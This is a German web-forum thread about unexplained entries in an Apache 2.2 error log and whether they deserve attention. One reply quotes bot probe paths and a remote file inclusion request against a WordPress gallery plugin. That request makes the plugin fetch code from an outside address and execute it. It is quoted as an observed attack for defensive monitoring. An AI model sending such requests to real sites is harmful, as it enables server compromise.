Apache ErrorLog

milkboy

Aktives Mitglied
Hallo

Ich bin mit meine APACHE Server (Version 2.2) sehr zu frieden. Aber leider habe ich trotzdem ein kleines Problem.

In der "error.log" werden mir viele Fehler angezeigt, welche ich nicht auswerten kann.

QUOTE [Tue Jun 12 09:29:51 2007] [error] [client 12.345.67.89] , referer: http://xxxx.xx/xxxx/


Kennt jemand dieses Problem.

Hier noch die conf:

QUOTE ErrorLog /error.log

LogLevel error

<IfModule log_config_module>

LogFormat "%h %l %u %t \"%r\" %>s %b" common

CustomLog /access.log common

</IfModule>


Kennt jemand dieses Problem oder die alfällige Lösung?
 
Solange diese Meldungen nicht wirklich den Betrieb deiner Seiten stören sollte es egal sein. Es gibt leider viele Bots die zufällige Zeichenfolgen versuchen aufzurufen oder mit speziellen URLs bestimmte CMS versuchen zu knacken - sowas verursacht dann eben (auch) Einträge im ErrorLog.
 
Merci für die Antwort.

Ich finde es nur seltsam, das auch die einfachsten PHP Scripts solche fehler verursachen. Kann das an der Programmierung liegen?
 
Solche Log-Ausgaben gehören zu dem Tagesgeschäft. An Ihrer Stelle würde ich deswegen keine sorgen machen. Wie schon gesagt, ein großteil von solchen Fehlern wird durch verschiedene Bots erzeugt.
 
QUOTE (threadi @ Di 23.09.2008, 19:23)Solange diese Meldungen nicht wirklich den Betrieb deiner Seiten stören sollte es egal sein.

Solche Aussagen halte ich für fatal.

Solange ich nicht weiß, was tatsächlich der Fehler war, weiß ich auch nicht, ob das bsp. reguläre Nutzer sind, die dann plötzlich eine weiße Seite erhalten ... und gehen, natürlich sagen die nicht Bescheid, ist nicht ihr Job.

Ob das Bots sind, die zu hacken versuchen, weißt Du erst, wenn Du die Details kennst, erst dann kann man das ignorieren.

Innerhalb von server-daten lasse ich mir Mails bei fast allen irregulären Dingen zuschicken (außer bei 410, die kriegen einige Sauger absichtlich). Nur ist das eine .NET-Architektur. Vor ein paar Monaten hat mal jemand ähnliches für PHP gepostet, da gibt es eine analoge Standardtechnik.

Von daher kenne ich auch die regelmäßigen Hackversuche, etwa


QUOTE Der Pfad /cacti/graph_image.php wurde nicht gefunden.
Der Pfad /admin/phpMyAdmin/main.php wurde nicht gefunden.


Richtig heftig sind dann diese:


QUOTE /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://IP-entfernt/adu/adu.png?


Da wird an ein WP-Plugin ein externes Bild übergeben, das offenbar geparst und dann ausgeführt wird. Es ist schon wichtig, mitzukriegen, was es an aktuellem Unsinn im Web gibt.

Aber solche Dinge kann ich ignorieren - Fehlermeldungen, die Nutzer direkt kriegen, über die werde ich so auch informiert und kann die Bugs beseitigen (die gibt es inzwischen auch kaum mehr).
 
Zurück
Oben